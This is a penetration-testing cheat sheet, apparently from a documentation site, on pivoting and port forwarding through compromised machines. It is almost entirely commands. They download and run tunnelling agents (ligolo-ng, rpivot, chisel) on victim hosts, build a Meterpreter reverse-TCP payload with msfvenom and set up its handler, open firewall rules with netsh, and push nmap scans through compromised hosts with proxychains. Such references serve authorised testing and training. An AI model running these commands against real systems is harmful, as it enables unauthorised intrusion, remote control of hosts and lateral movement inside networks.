Pivoting / Forwarding
00. Basic
## ------------------| Check arp table
arp -anPort Forwarding to other machine to Kali VM's VPN
## ------------------| Method I (SSH Reverse Tunnel)
### Machine-A (192.168.1.130) – Source Machine
### Machine-B (192.168.10.3) – Relay Machine (Inside VM with VPN 10.10.xx.xxx)
### If you want to forward HTTP (port 80) traffic from Machine-A to Machine-B's VPN, use the following steps:
### Step 1: Establish an SSH Reverse Tunnel from Machine-A to Machine-B
### Run the following command on Machine-A:
ssh -R 8080:10.10.11.123:80 Machine-B
### Step 2: Redirect Traffic on Machine-B to Port 8080
### Once SSH is established, run the following command on Machine-B:
sudo iptables -t nat -A OUTPUT -p tcp --dport 80 -j REDIRECT --to-port 8080
## ------------------| Method III (iptables & NAT) - Requires Root Access on Both Machines
### Step 1: Enable IP Forwarding on Machine-B
### Run the following commands on Machine-B:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.10.11.123:80
sudo iptables -A FORWARD -p tcp --dport 80 -j ACCEPT
### Step 2: Route Machine-A’s Traffic Through Machine-B
### Run the following command on Machine-A:
sudo ip route add 10.10.11.123 via 192.168.10.3
## ------------------| Method II (SOCKS Proxy)
### Using SOCKS Proxy for Full Traffic Redirection
### Step 1: Start a SOCKS Proxy on Machine-B
### Run the following command on Machine-B:
ssh -D 1080 Machine-A
### Step 2: Configure Machine-A to Use the Proxy
### Run the following commands on Machine-A:
export http_proxy="socks5h://127.0.0.1:1080"
export https_proxy="socks5h://127.0.0.1:1080"01. Port Forwarding
## ------------------| Agent [target/victim computer]
## Windows
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "windows_amd64.zip" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-windows.zip
unzip -j /tmp/agent-windows.zip -d $PWD agent.exe
.\agent.exe -connect <MyIP>:11601 -ignore-cert
## Linux
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "linux_amd64.tar.gz" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-linux.tar.gz
tar -xvf /tmp/agent-linux.tar.gz -C $PWD agent
./agent -connect <MyIP>:11601 -ignore-cert
## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session
ifconfig
sudo ip route add <IPRange>/24 dev ligolo ## Ex: 172.17.0.0/24
start
## Scan live hosts
fping -a -g 172.17.0.0/2401.1 SSH Port Forward
## -N Do not execute a remote command. This is useful for just forwarding ports.
~C # do it as very first command
## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
autossh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
## ex: ssh -L 3306:127.0.0.1:3306 [email protected]
## 3306 is victim's machine port
## 1337 is our machine port
ssh> -L 1337:127.0.0.1:3306
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>
## 3306 is victim's machine port
## 1337 is our machine port
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## ------------------| Dynamic Port Forward (Use of proxychain)
ssh> -D 1080
socks5 127.0.0.1 1080
## Config proxychain
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## 1337 is our machine port
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap
proxychains nmap -sT 172.16.1.0/24## ------------------| Normal
socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306
## ------------------| Send smb traffic from kali VM to windows VM
sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:<WINDOWS_VM_IP>:445## ------------------| Normal
## Server side
./chisel server --reverse --port 1234
## Client side
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001
## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf
socks5 127.0.0.1 1080
## Use nmap with proxychains## ------------------| For all routes
sudo sshuttle -vvr [email protected] 0/0
sudo sshuttle -vr [email protected] 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr [email protected] 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr [email protected] 0.0.0.0/24 --ssh-cmd "ssh -i ./id_rsa"
## ------------------| For specific route
sudo sshuttle -vr [email protected] 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"01.5 Using ncat tunnel
## ------------------| Set ncat for target machine
ncat -vv --listen 1337 --proxy-type http
## ------------------| Edit on the attacker machine (10.10.110.100 is the IP of my ssh machine)
echo "http\t 10.10.110.100 \t1337" >> /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf
## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24## ------------------| On Server
hts --forward-port localhost:3306 1337
## ------------------| On Client
htc --forward-port 3306 <compromised_ip>:133701.7 Using Plink.exe
cp /usr/share/windows-resources/binaries/plink.exe .
.\plink.exe root@<OURIP> -R 445:127.0.0.1:455
cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.01:3306 <our_ip> 01.8 Using netsh.exe
## 3306 is victim's machine port
## 1337 is compromised machine port
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>
## Add firewall rule
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=4545 action=allow## ------------------| Forword my google.com traffic to resticted device
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add following line
0.0.0.0 80 <GoogleIPAddress> 80
### Restart service
sudo service rinetd restart
### Success ? (on resticted machine)
nc -znv <AttackerIP> 80 ## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989
## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989
## ------------------| Proxy
/etc/proxychains.conf
socks4 127.0.0.1 1080
proxychains nmap -sT -p 80 <IP>01.11 Using Metasploit with Meterpreter
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin
## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i
## ------------------| Methord 0x01
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run
## ------------------| Methord 0x02
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
## -l (8003) is listening us
## -p (3306) this port running on compromised machine
## -r (172.17.0.1) compromised ip address
## then you can use 127.0.0.1:8003 from your endLast updated
Was this helpful?
